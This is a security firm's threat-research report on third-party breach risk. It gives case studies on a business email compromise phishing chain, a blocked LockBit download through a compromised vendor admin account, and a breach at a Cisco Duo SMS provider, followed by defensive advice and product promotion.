Webinar | Team Burned Out on Phishing Analysis? Here's How to Help.
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
July 25, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Key Points
Most organizations work with countless third-party vendors and suppliers in relationships that are not only necessary but also fruitful, contributing to increased revenue, customer retention, and access to outside resources and expertise. In the digital age, the number of these collaborations has surged, offering financial benefit but also presenting significant security challenges. This report will outline the definition and scope of third-party risk, analyze various real-world examples, and provide strategic insights into managing these risks effectively. Additionally, it will detail ReliaQuest’s robust detection and response strategies aimed at protecting organizations from the threat of third-party compromise.
Third-party risk refers to the potential for your organization to be negatively affected if a vendor or supplier is impacted by a cyber incident. The scope of third-party risk is vast, encompassing all the possible impacts of security breaches affecting vendors or suppliers, regardless of scale. Depending on the nature of the third-party breach, the consequences for customer organizations can be diverse, as indicated by the following non-exhaustive examples.
Whether or not a third-party breach leads to a direct attack on a customer organization, other repercussions—ranging from exposed data and service downtime to supply chain disruptions—can still inflict significant damage. It is estimated that 98% of organizations are affiliated with at least one third party that has suffered a breach, meaning that almost every company is at immediate risk of the direct or indirect consequences of a third-party breach. Multiple threat actors including “LockBit” and “Clop” use third-party compromise as an attack vector to target other organizations, with the efficacy of large-scale ransomware campaigns such as the Clop “MOVEit” campaign being partly determined by its impacts via the third-party vector. The prevalence of third-party breaches is expected to remain high throughout 2024, with certain kinds of breach showing particular popularity. For example, ReliaQuest observed a marked increase in BEC attacks through 2023 due to advances in techniques and their potential lucrativeness, a trend which is set to continue throughout 2024.
The sheer volume of companies associated with third parties that have been compromised shows that third-party risk is a global problem that can affect organizations in all industries. However, the risk is particularly pronounced in the healthcare and social assistance and financial services sectors, which tend to be more dependent on third-party service providers. In the healthcare sector, for example, reliance on external providers for core functionalities such as data storage means the consequences of third-party breaches can be particularly severe, often leading to the release or threatened release of highly sensitive patient data. Recognizing the seriousness with which organizations view third-party compromises, threat actors sometimes allege breaches on major third-party providers to exert pressure on them. For instance, in an incident that began in May 2024, the threat actor “ShinyHunters” claimed to have breached the cloud-services provider Snowflake, demanding a $20 million ransom for leaked data from two of their customers. Although Snowflake maintains that these breaches were not third-party and resulted from customer use of single-factor rather than multifactor authentication, the allegations nevertheless caused substantial concern among their customers and sparked ongoing speculation about the validity of the threat actors’ claims.
In this section, we examine three case studies highlighting some of the various attack vectors and impacts that characterize third-party breaches. The first two case studies show how third-party breaches posed direct risks to customer environments, while the third extends the focus to the downstream effects of attacks on infrastructure managed by a fourth party.
In October 2023, ReliaQuest uncovered a security incident in which a customer was targeted with over 1,000 phishing emails originating from a compromised third-party business email account. The attack was linked to the “Storm-1167” threat actor, which used a phishing link to lead victims to a fraudulent Microsoft sign-in page and capture their session tokens. These tokens allowed the attacker to access the customer’s internal email and cloud services.
A compromised internal account was subsequently used to send an additional 1,300 emails with a credential harvester, suggesting an attempt to target higher-privilege accounts and widen the attack’s scope. To delay detection, the threat actor created email rules to auto-forward emails containing specific keywords to a designated folder. ReliaQuest escalated the incident, advising the customer to rotate account credentials, block the sender and domain, and clear the phishing emails from recipients’ inboxes.
This incident highlights how business email compromise can result in multi-level breaches, with the initial compromise of the third party used as a basis for a further phishing campaign against the customer using emails sent using their own domain. The potential for compromised email addresses to be used against other entities in a continuing attack chain highlights that third-party breaches such as these can have far-reaching consequences. Although preventing sophisticated BEC attempts like this is difficult, it is essential to ensure that strong email authentication measures are in place to offer the best possible defense. This includes monitoring and blocking emails even from trusted domains if they resemble those used in BEC attempts. For emails that do manage to bypass detections, ReliaQuest’s GreyMatter Phishing Analyzer is a useful tool for automatically evaluating and removing emails reported as suspicious and initiating response actions.
In October 2023, ReliaQuest detected a user from a customer in the healthcare and social assistance sector attempting an unusual process via a PowerShell command. Our analysis revealed that the account executing the PowerShell command was a compromised third-party administrator account.
After compromising the third-party account, the threat actor attempted to download the executable file “cortex.exe” in the customer environment from the IP address 185.212.128[.]41. An endpoint detection and response (EDR) tool blocked this download; however, our analysis indicated that the cortex.exe file was a “LockBit 3.0” executable, related to the LockBit ransomware group. It is highly likely the customer had been targeted by a LockBit ransomware attack via the third party.
After the download was blocked, ReliaQuest took further steps to ensure that the customer environment remained secure. We recommended that the customer isolate the host and terminate any ongoing sessions linked to the compromised account. After mitigating the immediate threat, ReliaQuest advised rotating the user’s credentials and reimaging the affected host. We then blocked all indicators of compromise (IoCs). This ensured that LockBit would no longer be able to use the compromised account to carry out further malicious activities toward the customer, and that if they had discovered any customer credentials during the initial compromise, these would be unusable.
How the third party was compromised in this case is not known; however, targeting third-party providers has become a common strategy for ransomware groups, like LockBit and Clop. To reduce the possibility of threat groups using this attack vector, it is essential for organizations to carefully vet vendors and suppliers. To make it as difficult as possible for threat actors to use third-party administrator accounts, it is important to ensure that all accounts use multifactor authentication, and all credentials are unique for each organization the third party interacts with. Additionally, make sure that the principle of least privilege is adhered to: If third parties have access to your environment, they should only have access to the parts of your environment necessary to complete the tasks they are responsible for.
On April 1, 2024, MFA service provider, Cisco Duo, informed customers that an unnamed provider who handled the company’s SMS and voice over IP (VoIP) MFA messages had been compromised due to a phishing incident. The threat actor who targeted the provider downloaded SMS and VoIP message logs associated with specific Duo accounts. The data in the logs contained the phone number, carrier, location data and date, time, and message type from employees of customer organizations. At the time of writing, it is not known if threat actors have breached Cisco Duo customer environments using this stolen data.
The Cisco Duo vendor breach underscores the efforts by threat actors to target critical components of corporate security architecture. By focusing on third- and sometimes fourth-party providers, threat actors can exploit the dependencies that corporations have on their service providers, critical for functions like MFA. In this case, the threat actor used phishing to obtain credentials from an employee at a provider for Cisco Duo, highlighting how far outside the control of Cisco Duo customers the incident was.
Effective management of third-party risk is essential for maintaining the security and integrity of an organization’s operations. Third-party risk management is inherently challenging because it involves variables outside an organization’s direct control, necessitating a proactive approach to understanding these risks and preparing strategic responses for potential worst-case scenarios. The best practices detailed here can help organizations mitigate risks associated with their third-party relationships.
ReliaQuest uses multiple methods to detect third-party breaches, while also deploying effective detection, containment, and response mechanisms to protect customers if data compromised in a third-party breach is used to target their environment.
Detecting third-party breaches poses a significant challenge, as they often only come to light when they are publicly announced or when compromised data is used in subsequent attempts to breach customer environments. Additional complicating factors exacerbate this issue. For instance, a third party may be reluctant to disclose that it has been compromised in a cyberattack, fearing the potential reputational damage and customer loss that could occur as a result. In addition, there are multiple contexts in which a third party might not be aware of a breach, particularly if they have been targeted by an advanced persistent threat (APT) group specializing in espionage operations. In such instances, the APT would compromise systems but maintain a low profile to avoid detection, quietly gathering sensitive information to be used in attacks against other organizations. In some cases, a subsequent cyber attack might never be linked back to the compromise of a third party. Consider a scenario, for example, where a customer organization is hit by a spearphishing campaign that uses proprietary information obtained from a third-party breach. If the phishing emails originate from unrelated domains and use this information subtly, without making explicit references, pinpointing the origins of the attack becomes almost impossible.
To enhance awareness of third-party compromises, organizations can use ReliaQuest’s Threat News Tippers and Intelligence Updates, which highlight significant breaches reported in the media, including those related to major third-party service providers. In addition, Ransomware Tippers identify organizations that have been listed on leak sites operated by ransomware groups.
For GreyMatter Digital Risk Protection customers, additional functionalities are available. This service continuously monitors the open, deep, and dark web, including closed and technical sources, for third-party data breaches relevant to customers, including billions of files exposed via misconfigured S3 buckets, file transfer protocol (FTP), RSync and server message block (SMB). In 2023 alone, we discovered over 6 billion exposed credentials in breached data on the clear and dark web, bringing the total number we have found to more than 36 billion. Monitoring the clear and dark web in this way ensures that customers are promptly informed not only when third parties are directly breached, but also when inadequate security practices by third parties allow threat actors to access sensitive data.
ReliaQuest is committed to safeguarding our customers against the wide-ranging threats that could arise from third-party compromises. Our detection rules and response plays help defenders react rapidly when threat actors are attempting breaches using data obtained from third-party compromises.
Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization.